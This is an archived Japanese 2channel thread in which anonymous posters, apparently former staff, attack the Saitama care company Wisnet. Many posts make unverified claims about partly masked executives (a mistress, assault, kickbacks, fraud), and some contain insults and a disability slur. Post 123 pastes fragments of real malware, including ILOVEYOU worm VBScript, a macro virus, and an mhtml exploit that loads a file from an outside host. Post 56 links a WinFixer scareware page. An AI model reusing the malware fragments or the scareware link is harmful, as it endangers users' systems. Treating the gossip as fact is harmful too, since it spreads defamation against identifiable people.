2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

[埼玉] 業界九位のウイズネットって?

1 :ななしのフクちゃん:2005/12/12(月) 18:23:27 ID:33L+xv3q
ここ五年位で急激に成長している、福祉総合企業。
さて中身は?


ウイズネット
http://www.wis-net.co.jp/index.html

2 :ななしのフクちゃん:2005/12/12(月) 21:29:08 ID:33L+xv3q
age

3 :ななしのフクちゃん:2005/12/14(水) 12:50:04 ID:47C23imv
大宮の出かいビルに本社があるらしいね〜。グループホームがたくさんあるみたい。「みんなの家」っていったかな?

4 :ななしのフクちゃん:2005/12/14(水) 22:11:45 ID:47C23imv
age

5 :ななしのフクちゃん:2005/12/27(火) 21:15:40 ID:AFWij7Qy
私は離職者です。離職率高いよ。

6 :ななしのフクちゃん:2005/12/30(金) 10:52:48 ID:eFecWwWB
高○一家の個人商店でしょ。

7 :ななしのフクちゃん:2006/01/01(日) 16:58:11 ID:sBmrVial
>>6
そ、同族のなんでもあり会社。悪いこといわんからやめとけ。

8 :ななしのフクちゃん:2006/01/12(木) 22:03:57 ID:VQ0jNkxM
今日の新聞に載ってたよ。悪い情報ではなく、
他県のグループホーム火災について、ウイズネットは
火災防止に力を入れてるって書いてあった。

9 :ななしのフクちゃん:2006/01/19(木) 21:12:36 ID:FOOexADn
実際、グループでの火災対策ってどう力を入れるんだ?スタッフ、利用者を禁煙にしろってか?厨房はまた別の会社だしね〜

10 :ななしのフクちゃん:2006/01/20(金) 14:45:35 ID:8ST1AhzO
高○が、自分で放火しそう。

11 :ななしのフクちゃん:2006/01/23(月) 10:16:30 ID:bwU97NGl
>8
数ヶ月前からチェック表つけてるだけw新聞記事は理想論w

12 :ななしのフクちゃん:2006/01/24(火) 01:16:44 ID:NiHRcazV
だろうな。しかし、同じ日にちにチェック項目が二つあるのは何故?

13 :ななしのフクちゃん:2006/01/24(火) 22:19:10 ID:VB7kNaOE
2人でチェックしろってことさ

14 :ななしのフクちゃん:2006/01/28(土) 13:45:15 ID:y1lqznos
まぁ給料以外はそんなに悪い会社ではないのでは。と釣ってみる

15 :ななしのフクちゃん:2006/02/01(水) 20:53:48 ID:i+zscRLp
過去最悪。
同族企業の悪いとこだけ引き継いでるね。

16 :ななしのフクちゃん:2006/02/02(木) 11:20:50 ID:p1OZfKkA
本社の社員と今年入社する新入社員だけで、忘年会(新年会?)を都内のでかいホテルでやったらしいな。別にそんな所に行きたくはないが、現場の人間を省みない会社だという事は分かった。

17 :ななしのフクちゃん:2006/02/03(金) 21:21:04 ID:TlA+b8c2
本社は休みなし、罵声が飛び交ってます。
離職率が異常に高い。

18 :ななしのフクちゃん:2006/02/04(土) 12:27:58 ID:pyM6b/rU
>>17

詳しく!!


19 :ななしのフクちゃん:2006/02/05(日) 10:59:01 ID:HFtT8FfK
代表は神様です。


20 :ななしのフクちゃん:2006/02/06(月) 19:43:31 ID:Zlb45r75
age

21 :ななしのフクちゃん:2006/02/06(月) 21:44:02 ID:YENxfCBP
息子は皇太子様です。


22 :ななしのフクちゃん:2006/02/07(火) 13:16:54 ID:bOXkB4/K
専務は愛人です。

23 :ななしのフクちゃん:2006/02/08(水) 21:31:29 ID:zlV+GDPO
ファミリー企業


24 :ななしのフクちゃん:2006/02/12(日) 20:11:10 ID:QeWp7s0V
北朝鮮企業

25 :ななしのフクちゃん:2006/02/14(火) 00:01:09 ID:TFOlYvt6
−−−−−−−−−− 糸冬 了 −−−−−−−−−−−

26 :ななしのフクちゃん:2006/02/15(水) 23:41:32 ID:bpo339aN
ここで人生設計の狂った奴は多い

27 :ななしのフクちゃん:2006/02/16(木) 00:40:33 ID:rr87rJOo
デイサービスの生活相談員やらグループホームの計画作成担当者は常時居ないんだよ〜  いつか ばれたら怖いネエ
減算だよね〜 

28 :ななしのフクちゃん:2006/02/16(木) 00:44:38 ID:rr87rJOo
専務が嫌で退職する人多いよ〜 目つけられたら痛い目あうよ〜

29 :ななしのフクちゃん:2006/02/16(木) 00:50:04 ID:rr87rJOo
給料が低すぎて辞めるのが多いよ〜 デイサービスの常勤は手取り¥12〜13万ぐらいだよ
酷いよね〜 管理者も¥14・15万ぐらいだよ〜 

30 :ななしのフクちゃん:2006/02/16(木) 17:12:36 ID:5OYnfllY
それは安いな。ちなみに計画作成担当者とは実務者研修を修了してる人の事なのかな。それともケアマネなのかな。
それとグループホームの良し悪しはそこのホーム長次第。本社はあまり発言力はない気がする。

31 :ななしのフクちゃん:2006/02/16(木) 19:11:23 ID:6BHU7HAx
グループホームはセクハラの温床ですよ!

32 :ななしのフクちゃん:2006/02/16(木) 22:34:49 ID:1+7+14Px
代表に嫌われたら終わりだよ。
北朝鮮並

33 :ななしのフクちゃん:2006/02/16(木) 23:13:26 ID:EuXnYN0Q
計画作成担当者は実務者研修修了者のこと。 退職した人のままみたいよ〜
ショートステイも生活相談員居たためしないだとか・・・

一斉監査でもないかな〜 おもしろそう!!

34 :ななしのフクちゃん:2006/02/16(木) 23:21:02 ID:EuXnYN0Q
いつか下落する会社だよ・・・ まだまだ開設するみたい
人員と質が最低な会社なだけに無理でしょう!!

株上場のことしか考えてないのだから〜
あくまでも いかに、安く職員を扱うのがウイズネット!!

35 :ななしのフクちゃん:2006/02/16(木) 23:29:05 ID:EuXnYN0Q
ウイズネットだけの経験では、転職しても馬鹿にされるよ〜
だって、知識、技術なさすぎだよ〜
管理者も 誰でもなれる会社だもんね〜
グループホームの職員は酷すぎ!! 利用者を もっと大事にしろ!!

36 :ななしのフクちゃん:2006/02/16(木) 23:33:39 ID:EuXnYN0Q
専務は陰口言いまくり!! あなたも言われてますよ!!
表では笑ってるけど 裏では悪口だらけ・・・

37 :ななしのフクちゃん:2006/02/16(木) 23:37:01 ID:EuXnYN0Q
株上場してもトップ(役員)だけが笑うだけ・・・
現場の職員の給料を削ってまで・・・許せない!!

38 :ななしのフクちゃん:2006/02/16(木) 23:42:03 ID:EuXnYN0Q
とにかく一度痛い目くらえ!!

39 :ななしのフクちゃん:2006/02/16(木) 23:47:43 ID:EuXnYN0Q
埼玉では、コムスン、そよ風、ウイズネットは最悪だって有名だよ〜
福祉業界では基本でしょう!!

40 :ななしのフクちゃん:2006/02/17(金) 11:36:55 ID:vkrwWeqV
>>29 役員報酬だけは、上場企業並み。

41 :ななしのフクちゃん:2006/02/17(金) 15:41:34 ID:0A5rbBAS
SVとか最悪・・・氏ね

42 :ななしのフクちゃん:2006/02/17(金) 22:45:20 ID:myAoEFm9
なんていうSV?? どんなとこが最悪なの?? SVっていうくらいなんだから仕事が出来るんじゃない??

43 :ななしのフクちゃん:2006/02/17(金) 23:31:48 ID:IL419BwZ
こんなグループホームの運営 つぶれて欲しい!!

44 :ななしのフクちゃん:2006/02/18(土) 08:58:11 ID:RziC4KKG
SVなんて他の企業で管理職やって落ちこぼれたやつばっか! 介護のシロウト                         とくにキモイのがYMD

45 :ななしのフクちゃん:2006/02/18(土) 14:36:20 ID:oHhuZ132
不満なら自分で開業すれば?クズども

46 :ななしのフクちゃん:2006/02/18(土) 19:06:05 ID:2uKCNdm1
ここは人を使い捨てにするからねえ。


47 :ななしのフクちゃん:2006/02/18(土) 20:01:15 ID:BiDph+c8
なんか どの建物も味気ない作りだよね・・・
もっと開発!勉強しろ!!
素人並だぞ〜

48 :ななしのフクちゃん:2006/02/18(土) 20:06:52 ID:BiDph+c8
どの部署もレベル低い・・・

それと本社・事業本部の女性は 皆 ブスばっかり〜
化粧濃いのも多いね・・・歳が・・・

49 :ななしのフクちゃん:2006/02/19(日) 02:57:11 ID:I/GO2Asf
45           ははは・・・                  かまってあげようか?              くずちゃん

50 :ななしのフクちゃん:2006/02/19(日) 10:13:37 ID:DfVaKJrP
結局、こういった独裁企業には就職するなって事。
他社の管理職の落ちこぼれ(証券、商社、保険が多い)を管理職において、
現場素人が頓珍漢な指示出して、現場を混乱させる。

現場を無視する管理職がいっぱい。

51 :ななしのフクちゃん:2006/02/19(日) 15:12:55 ID:R968ZXl9
代表は大卒って本に載ってましたよ・・・ウィズネットの挑戦。


52 :ななしのフクちゃん:2006/02/19(日) 15:34:16 ID:R968ZXl9
もう一つ!
離職者が多いと株式の上場がムヅカシクなるそうです。
2ちゃんねるで書かれている事が本当であれば、当面は上場出来ないはず。

役員の中に愛人がいるような企業は無理!世の中結構多いのよ。
上場する前に現在までの悪事に対処しておかないと、上場後、週刊誌のいいネタになる。
ジャーナリストは日々ネタ探しの為、夜中にネットを徘徊する。
2ちゃんねるの掲示板から抜粋される事がここ数年前からの常識!!


53 :ななしのフクちゃん:2006/02/19(日) 21:51:27 ID:S+yTIQZg
上場より、
労働局が対策に乗り出すのが先でしょう。


54 :ななしのフクちゃん:2006/02/20(月) 08:57:34 ID:vtODKtPQ
職安の求人票覧を検索すると、ちょこちょこ変更したり登録をやり直している
事が読み取れます。特に、休日の所と給料報酬の所がイキナリ低くなったりしている。
新たに登録された総務の管理職の求人の給料’安すぎ’。
こんなんで、まともな人を本気で雇う気が有るのだろうか?
この会社って低所得者を増やしているように見えます。
現場の人の報酬なんて、ボランティア並みに近いようですね。
それで上層部の一部の人(役員クラス)が高給取りだったら問題ですね。


55 :ななしのフクちゃん:2006/02/20(月) 10:11:23 ID:vtODKtPQ
労働局は腰が重いので、よっぽどの苦情がないと動かないのでは?

56 :ななしのフクちゃん:2006/02/20(月) 11:08:38 ID:2Nkw3rmo
こういうのは?
http://jp.winfixer.com/pages/scanner/index.php?aid=orda_lng_ed2&lid=ron&ex=1&p=&ax=1

57 :ななしのフクちゃん:2006/02/20(月) 17:50:32 ID:vtODKtPQ
age

58 :ななしのフクちゃん:2006/02/21(火) 15:31:28 ID:30VcFHci
今日も夜勤中にセクハラされました

59 :ななしのフクちゃん:2006/02/21(火) 18:19:30 ID:w9uUkWQE
58>>詳しく・・・キボンヌ。

60 :ななしのフクちゃん:2006/02/21(火) 22:56:37 ID:3INVbGfO
本当に専務は愛人でした。高級車乗ってますよ。
高卒の女性の年収1000万円以上ですものね。
実際、仕事できて優秀な人が格下され続けて辞めました。

61 :ななしのフクちゃん:2006/02/22(水) 01:14:59 ID:QK0LLHcg
そうですよね・・・高級車のあげく、高速出勤。今でも代表を見る目は違いますよね
専務が変わらないと まだまだ退職しますよ・・・

62 :ななしのフクちゃん:2006/02/22(水) 07:29:17 ID:YtrillSY
こういう会社は相手にしないで、さっさと他所へ転職するのがいいよ。


63 :ななしのフクちゃん:2006/02/22(水) 08:25:47 ID:ChoG65hP
でも、専務って代表と苦労を友にしてきた創業者メンバーだと聞きましたが、
そう言った場合は、しょうがないのでは・・・当面はね〜。
但し、愛人の件に関しては本当だったらこの専務がいる以上は会社は伸びないよね。
実力が有るのならこの時代学歴は関係ないと思うよ・・・学歴勝負するような企業なんて、
今時ナンセンスって感じですな〜。但し、社会に出たばっかりの場合(20代半)までは
、はっきり言って大卒の方が使えるのも事実。


64 :ななしのフクちゃん:2006/02/22(水) 08:54:25 ID:ChoG65hP
もう一つ、社名がちょっとIT系を意識しすぎ、現業とかけ離れていてキモイ。

65 :ななしのフクちゃん:2006/02/22(水) 19:28:40 ID:UIpvNqeW
個人攻撃は止めましょう。
さっさと転職しましょう。

66 :ななしのフクちゃん:2006/02/22(水) 22:45:01 ID:LIvycNqa
賛成!!転職するのが一番”
絶対 いい事無いから”

67 :ななしのフクちゃん:2006/02/22(水) 22:48:45 ID:LIvycNqa
もうひとつ”
専務、結婚出来たのはいいけど・・・
料理出来ないから毎日、外食か弁当だって・・・
帰りも遅いし、旦那様かわいそう・・・
子供もいないしね。。。

68 :ななしのフクちゃん:2006/02/22(水) 22:52:47 ID:LIvycNqa
バツイチ・未婚の女性職員多いね・・・
仕事ばかりの人生も寂しいもんだよ・・・
とくに本社・事業本部の職員は・・・

69 :ななしのフクちゃん:2006/02/22(水) 23:03:10 ID:ChoG65hP
じゃあ〜いい男はいる?

70 :ななしのフクちゃん:2006/02/22(水) 23:06:08 ID:LIvycNqa
いるわけないでしょう”
仕事が出来ないクズばっかり!!

71 :ななしのフクちゃん:2006/02/22(水) 23:11:19 ID:LIvycNqa
小口現金使い放題だから良いよね・・・
現場は使用で使ってるよ〜 領収書切っちゃえば分かんないからね・・・

72 :ななしのフクちゃん:2006/02/22(水) 23:12:08 ID:FcFQfCrn
職場の後輩が、ここに転職して行ったけど、
どうしてるのかなぁ。おとなしく、社福法人で
ぬくぬくとやってれば良かったのに。

73 :ななしのフクちゃん:2006/02/22(水) 23:15:38 ID:LIvycNqa
ホームの夜勤でエッチしてる職員がいるらしいよ・・・
グループホームは良くある話らしい・・・
利用者にキスしてるの見られた職員カップルいるって!!
認知症を甘くみては駄目だよ!!

74 :ななしのフクちゃん:2006/02/22(水) 23:20:06 ID:LIvycNqa
グループホームでは、利用者放置してるホーム多いって・・・
外出を全くさせないとこも多いらしい・・・
利用者、監禁してるのと一緒だよ!! 利用者かわいそう・・・

75 :ななしのフクちゃん:2006/02/22(水) 23:45:24 ID:UIpvNqeW
×イチ未婚が多いのは、代表の愛人候補です。
金正日な代表はあちこちでハーレム状態。
デートクラブみたいなもの。
専務は離婚しましたが、プライベートな件はタブーです。


76 :ななしのフクちゃん:2006/02/22(水) 23:55:37 ID:ChoG65hP
チッ、いい男いねえのかよ!


77 :ななしのフクちゃん:2006/02/23(木) 00:13:27 ID:3/xO5ON8
専務は いつ離婚したんですか??

78 :ななしのフクちゃん:2006/02/23(木) 06:56:28 ID:gEJOau4F
どうでもいいじゃないですか。
しかし、会社らしくない、人が育たない企業ですね。

79 :ななしのフクちゃん:2006/02/23(木) 10:15:31 ID:vWkdhFFI
面白そうだからそっちに転職してみようかな。

80 :ななしのフクちゃん:2006/02/24(金) 00:28:01 ID:muVa0ilk
アホか〜 面白そう?? あなたもクズの仲間入り〜

81 :ななしのフクちゃん:2006/02/24(金) 07:34:03 ID:rIsmLs4R
人生が狂う。
人を使い捨てにする企業だから。

82 :ななしのフクちゃん:2006/02/25(土) 20:23:50 ID:NMfa1mac
使い捨てにしない会社は生殺しの会社。
どっちにしますか?

83 :ななしのフクちゃん:2006/02/26(日) 11:09:44 ID:Jfv/bbER
ここは休みがありません


84 :ななしのフクちゃん:2006/02/26(日) 12:02:42 ID:5BKODL1T
不満があるなら、なんで通報しないの?
告発すれば良いじゃん。
しないなら黙って働くか、辞めるかだよね?

勇気がないのなら、やっぱり黙って働くしかないよね。
給料が安いと思うなら最初から勤めなければ良かったじゃん、騙されて
入社したのなら別だけどね。ありえない・・・

85 :ななしのフクちゃん:2006/02/26(日) 20:24:02 ID:B3rTEMYu
みんな騙されているから。

86 :ななしのフクちゃん:2006/02/27(月) 07:33:58 ID:IPYpBifu
辞めるが勝ち

87 :ななしのフクちゃん:2006/02/27(月) 12:34:44 ID:/wAUUcG+
辞めるなら、早く辞めれ〜
何をモアモタしてるの?他に行くところないの?
だったら黙って働きなよ!

騙されて入社したのなら訴えなよ!
条件諸々と納得の上勤めたんでしょうに・・・

不平不満ばかり影口たたかないで出るとこ出ればよいだけの話だよ、
もし本当の話だったら、この会社のトップは株主達から経営責任追求
され降ろされる。

88 :ななしのフクちゃん:2006/02/27(月) 17:44:01 ID:IPYpBifu
上場してないし、永遠に無理

89 :ななしのフクちゃん:2006/02/28(火) 01:08:08 ID:D1yJ3x8M
87の粘着ぶりは、専務?キモすぎ

90 :ななしのフクちゃん:2006/02/28(火) 17:42:02 ID:n0Ezf0d1
常務

91 :ななしのフクちゃん:2006/02/28(火) 18:27:22 ID:7Gz5qzz7
ここですか?低所得労働者の吹き溜まりは?

92 :ななしのフクちゃん:2006/02/28(火) 21:16:35 ID:yiRKSs2M
吹き溜まりですが何か?

93 :ななしのフクちゃん:2006/02/28(火) 21:56:16 ID:7Gz5qzz7
間違えました。ジャパユキさんだったのですね?
出稼ぎご苦労様です。もう少し安く働いて貰えませんか?


94 :ななしのフクちゃん:2006/02/28(火) 22:42:08 ID:iqjeOdis
常務、暴れすぎ

95 :ななしのフクちゃん:2006/03/01(水) 15:14:39 ID:BPwlGVDR
経営者として、身内(常務)(専務・・愛人)を、役員にするのはどうかな?
高○さん個人商店ですか?

96 :ななしのフクちゃん:2006/03/01(水) 17:53:35 ID:9yD5g9f7
同族企業はやりたい放題。
専務はいつも誰かを怒鳴っているよ。
犯罪だね。

97 :ななしのフクちゃん:2006/03/01(水) 18:07:55 ID:gaB4aDs+
俺が苦労して興した会社だよ、文句があるか〜ってか!?
どうでも良いけど、使用人は黙って働け・・・!と鵜匠が申してます。
鵜飼の鵜って、どんなのか知ってるよね?

まぁ〜そんな意識で人を使うと、いつか足を引っ張られる訳なんですが・・・


98 :ななしのフクちゃん:2006/03/02(木) 07:07:04 ID:+vPQEzJ/
代表を恨んでいる人は多いから

99 :ななしのフクちゃん:2006/03/02(木) 19:57:04 ID:LSNcN4eG
近い将来に明知光秀にヤラレルであろうぞ・・・織田信長殿。


100 :ななしのフクちゃん:2006/03/02(木) 23:45:10 ID:s4cvIwhY
息子の常務は暴れすぎ。
総務の爺さんを土下座させ、その頭を踏みつけた。
酷過ぎ。


101 :ななしのフクちゃん:2006/03/03(金) 08:05:43 ID:eWiwJQnQ
100>>それ本当の話かい?ならば同和に相談!

102 :ななしのフクちゃん:2006/03/03(金) 20:29:21 ID:GZ/3aKla
童話でFA?

103 :ななしのフクちゃん:2006/03/03(金) 20:30:02 ID:GZ/3aKla
童話でFA?

104 :ななしのフクちゃん:2006/03/03(金) 21:29:52 ID:eWiwJQnQ
ヒント・差別・人権・行政がキーワード
それ以上は、恐ろしくて書けまへん!自分で調べてね。

105 :ななしのフクちゃん:2006/03/06(月) 20:14:54 ID:NQLX90Go
age

106 :ななしのフクちゃん:2006/03/07(火) 18:08:05 ID:wDJkQBKY
END

107 :ななしのフクちゃん:2006/03/07(火) 20:08:33 ID:l0KqDJ1T
START

108 :ななしのフクちゃん:2006/03/07(火) 21:43:45 ID:yueuvoeA
代表の‘はげ‘目立つよね〜 それにしても親子(代表・常務)揃って キモイ顔!!
キモイ〜!!

109 :ななしのフクちゃん:2006/03/07(火) 21:58:07 ID:yueuvoeA
ホーム長・センター長諸君!!
ある程度経験踏んだら、転職するべし!!
他社では、ウィズネットの印象悪いから早いほうが良いよ!!
給料も違うよ!!

110 :ななしのフクちゃん:2006/03/08(水) 13:01:16 ID:yuWKs5IA
>109
あなたは粘着系ですか?
わたしは書き込みをずっと監視してる祭好きvipperですw
頃合を見て晒し祭りしてあげますのでいっぱい書いてねwww


111 :ななしのフクちゃん:2006/03/08(水) 19:13:17 ID:OwKgJzv/
活気が無く、そしてツマラナイ

と、言う事で・・・

終了!終了!終了!終了!終了!終了!終了!終了!終了!終了!
終了!終了!終了!終了!終了!終了!終了!終了!終了!終了!
終了!終了!終了!終了!終了!終了!終了!終了!終了!終了!
終了!終了!終了!終了!終了!終了!終了!終了!終了!終了!
終了!終了!終了!終了!終了!終了!終了!終了!終了!終了!
終了!終了!終了!終了!終了!終了!終了!終了!終了!終了!
終了!終了!終了!終了!終了!終了!終了!終了!終了!終了!
終了!終了!終了!終了!終了!終了!終了!終了!終了!終了!
終了!終了!終了!終了!終了!終了!終了!終了!終了!終了!
終了!終了!終了!終了!終了!終了!終了!終了!終了!終了!



112 :ななしのフクちゃん:2006/03/09(木) 06:15:01 ID:9Fqe30CC
ベネッセスタイルケアにどうぞ。

113 :ななしのフクちゃん:2006/03/09(木) 06:20:42 ID:9Fqe30CC
ライフコミューンにどうぞ。

114 :ななしのフクちゃん:2006/03/09(木) 14:51:36 ID:9AVN7BJr
ドクターズネット東京にどうぞ。

115 :ななしのフクちゃん:2006/03/09(木) 16:50:03 ID:uwXvQwui


116 :ななしのフクちゃん:2006/03/09(木) 23:25:29 ID:i9wAvwW5
こんな活気のない糞スレ・・・削除じゃないの?
内容が幼稚だし、こんなのじゃあ〜逆に企業の方がまともに読み取れるよ
もっとまともな事書きなさいよ・・・低額収入の労働者共!

終了〜〜〜〜!

117 :ななしのフクちゃん:2006/03/10(金) 09:43:24 ID:PCGrHwtX
低額収入のどこが悪いんだ?好きでやってんだよな?おまえらww

118 :ななしのフクちゃん:2006/03/10(金) 23:44:18 ID:tzk2ota2
騙されて入社してすぐに辞めていくのです。


119 :ななしのフクちゃん:2006/03/11(土) 08:00:42 ID:jh8yHmsV
調べればわかるだろ。

120 :ななしのフクちゃん:2006/03/11(土) 12:35:17 ID:LYbBbruw
レベルが低いレスだな〜

もう止めれよ!

削除依頼出しておくよ。

121 :ななしのフクちゃん:2006/03/11(土) 23:09:37 ID:2dYAFB1h
レベルが低い会社ですから
 
復活依頼出しておくよ。

122 :ななしのフクちゃん:2006/03/11(土) 23:15:37 ID:mOonaXBj
人を人とも思わない会社


123 :ななしのフクちゃん:2006/03/12(日) 00:21:09 ID:1yTn7TSk
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

124 :ななしのフクちゃん:2006/03/13(月) 22:26:52 ID:s+mgrHlp
こんな会社潰してやる!!

125 :ななしのフクちゃん:2006/03/14(火) 00:26:41 ID:fK8+8Nio
>124
やってからデカい口叩けw

126 :ななしのフクちゃん:2006/03/14(火) 19:47:47 ID:b88t2Q4d
エセ同和でも使うのかい?

127 :ななしのフクちゃん:2006/03/14(火) 23:46:06 ID:Df6oLRvF
ところでみなさんはここをどこでみつけました?
私はハローワークでした。

128 :ななしのフクちゃん:2006/03/15(水) 00:39:24 ID:55iOyZmL
社長のヘッドハントです

129 :ななしのフクちゃん:2006/03/15(水) 06:56:53 ID:/PXl2ho9
好みの女性だったのですね

130 :ななしのフクちゃん:2006/03/15(水) 19:51:30 ID:bhztIYcp
ヘッドハントで安月給???

131 :ななしのフクちゃん:2006/03/15(水) 20:53:46 ID:55iOyZmL
石●の障害娘が入社だってよ〜あははは
給料は片手ね。

132 :ななしのフクちゃん:2006/03/16(木) 06:59:35 ID:ehW6HX8a
もう何でもありだね。

133 :ななしのフクちゃん:2006/03/16(木) 18:03:58 ID:DHmWzExT
131>石●の障害娘が入社だってよ〜あははは
給料は片手ね。


お前の発言は非常に危険だと思うのだが?
ID:55iOyZmLもおっぴろげて・・・

無謀だな。

逆におまいが童話の餌食になるのかも知れんよ。



134 :ななしのフクちゃん:2006/03/20(月) 07:01:00 ID:OFWjx+pH
ここってメルヘンなの?

135 :ななしのフクちゃん:2006/03/21(火) 18:49:47 ID:s7CQ/HC0
上場無理だから・・・2ちゃん、マスコミ見たらしいよ!!

136 :ななしのフクちゃん:2006/03/21(火) 22:21:08 ID:OzAIuBMR
他の掲示板の書き込みで見たんだけど、建設業者と結託して地主から
建築費を多めに取って折半して山分けしているらしい・・・って書いてありました。

三階建の建物は耐震基準はどうなっているのでしょうね・・・もっとも手を抜きそうな
用途の部類だからねえ〜・・・

フリージャーナリストは、2ちゃんからネタを拾います。


137 :ななしのフクちゃん:2006/03/22(水) 10:12:43 ID:HbZciwae
こんな便所の落書きでマスコミが動くか!全部ガセだしな。

138 :ななしのフクちゃん:2006/03/22(水) 11:52:24 ID:e0xf73XP
136>建設業者には戻らず高○の別会社でコンサル料で処理しています。
怪しい関連会社があるでしょ。


139 :ななしのフクちゃん:2006/03/22(水) 11:54:56 ID:rbPKKeuE
建てさせて借りるんだよな

140 :ななしのフクちゃん:2006/03/23(木) 02:16:53 ID:EX/32Clo
それにしても、高○商店は子供を(常○やら)一度外に修行に出さないと 何にも知らない お坊ちゃんじゃ 先が見えてるね・・・

141 :ななしのフクちゃん:2006/03/29(水) 23:07:01 ID:hn7oJiGM
ほんと!!魅力ない奴等だよね・・・

142 :ななしのフクちゃん:2006/04/05(水) 10:20:21 ID:UUN7jaa6
DQN企業

143 :ななしのフクちゃん:2006/04/07(金) 21:48:22 ID:XuuybLWe
結局、泣き寝入りなのね

144 :ななしのフクちゃん:2006/04/07(金) 22:05:21 ID:hE2t647Q
情けない・・・

145 :ななしのフクちゃん:2006/04/10(月) 23:01:44 ID:nN6zDxDn
奴隷人生

146 :ななしのフクちゃん:2006/04/11(火) 17:32:22 ID:PEKRWCrg
第一条:通勤時や訪問時などは原則として正装する。また全裸で出勤する場合は時前に連絡をする。
第二条:頭髪はワーカーらしく清潔(もしくは不潔)にする。
第三条:屋上の利用は基本的に認めないが「どうしても」と言うなら認める。
第四条:刃物やウォークマン、職場に関係のないバター等は持参しない。
第五条:勤務中はマウスピースをはずす。
第六条:えりあしはなるべくオシャレにする。
第七条:遅刻3回は遅刻2回とみなす。
第八条:職場内暴力も遅刻2回とみなす。
第九条:基本的に、ガッツポーズは禁止する。
第十条:ハムはニフス指定のハムのみとする。
第十一条:もち肌は謹慎処分とする。
第十二条:おちょぼ口は解雇とする。
第十三条:SVに石を投げない。
第十四条:消しゴムを食べない。
第十五条:草を食べない。
第十六条:セミを食べない。
第十七条:許可なく豆を煮ない。
第十八条:線から出ない。
第十九条:なるべく奇声を発しない。
第二十条:本社に難しい事(漢字の読み書き等)を聞かない。
第二十一条:ハゲは控え目に行動する。
第二十二条:家庭の事情以外の理由でのホームの建設は認めない。
第二十三条:やむを得ず脱皮する場合は、勤務の妨げにならないようにする。
第二十四条:平熱は36度とする。
第二十五条:いい匂いはミントのみとする。
第二十六条:必要以上のゼリーを持って来ない。
第ニ十七条:コムスンに派遣されない。
第ニ十八条:役員は原則として人類以外は認めない。
第ニ十九条:変な汁を出さない。
第三十条:専務が指定した相手以外の奉仕活動は控える。

147 :アンチ:2006/04/13(木) 17:39:57 ID:fKhA+h4e
内部告発(本社勤務)多いね。

148 :ななしのフクちゃん:2006/04/13(木) 20:05:49 ID:WRqCnHkd
全然告発になってないよ・・・愚痴だな。

149 :ななしのフクちゃん:2006/04/15(土) 00:50:39 ID:jDzC2jMD
つうか、この会社ヤバイ。
最低賃金だよね。働いている人の人間性も問題ある人いるよね。まーのんきに本社勤務してて 現場知らん人がほとんど。それじゃ上場できないよ。

150 :ななしのふくちゃん:2006/04/16(日) 13:54:43 ID:Ra5QVlZS
一斉監査入ったら人員配置はじめやばいよね。家族は預けてるから言えないけど契約書もろもろたてに告発したら恐ろしいですね。

151 :卵の名無しさん:2006/04/16(日) 14:39:35 ID:HRDSr9Kn
社長はDQNで詐欺師

152 :ななしのフクちゃん:2006/04/17(月) 00:47:12 ID:HQHPEzKx
本社社員も低賃金だよ。


153 :陰口:2006/04/17(月) 22:09:27 ID:rkE+tf7t
無問題だな、そんな程度の語りでは。だれ一人として告発しないでしょ?
不平不満の捌け口なだけな掲示板。

静かにsageでやってなさい。

監査が入ろうとなんだろうと、厳重注意とかそんなもんでしょ?
ホリエモンと同じ確信犯だから最悪のシナリオは想定内と考えているでしょう。

154 :ななしのフクちゃん:2006/04/18(火) 00:10:50 ID:8wCKnY2V
だろね、注意されてもはいそうですかで終わり。
ウイズしか入れないのが己の実力だから、しゃーない。


155 :ななしのフクちゃん:2006/04/19(水) 01:49:00 ID:8lbaeElL
ウィズは介護の人から見れば休憩がてらに入るとこ。他の施設で疲れた人が行くんだよ。って誰かがいってた。

156 :ななしのおふく:2006/04/19(水) 03:10:50 ID:fO0MaVYl
懲罰委員会の委員長の社長自らセクハラまがいだからね!やみくもにでかくしすぎが災いで行政もよほどの告発ないかぎり業務停止命令だせないよね。『社長のきまぐれ商店』だよね〜みなさんでウィズネットの裏の社名コンテストしたらおもしろいね。

157 :ななしのフクちゃん:2006/04/19(水) 03:15:19 ID:fO0MaVYl
介護休憩で知人がウィズどうって聞いて来たけど給与きいてすぐ消えた

158 :ザキの元上司:2006/04/19(水) 03:17:26 ID:fO0MaVYl
みなさん、たまってますね(苦笑)

159 :ななしのフクちゃん:2006/04/19(水) 04:37:44 ID:916p5Eea
ごめんなさい。もう書き込みしませんので…
疲れてました。

160 :ななしのフクちゃん:2006/04/19(水) 04:53:45 ID:916p5Eea
猜疑心で仕事が手につかない状態にありました。
ご好意は受け取りましたし、もう見ません。
しっかり行動します。それでは…

161 :倶子:2006/04/19(水) 08:59:57 ID:+6yetp3K
はいはいはい、あそこんとこ・・・いいんですかぁ〜?

162 :ななしのフクちゃん:2006/04/20(木) 15:41:08 ID:uMEcRl9x
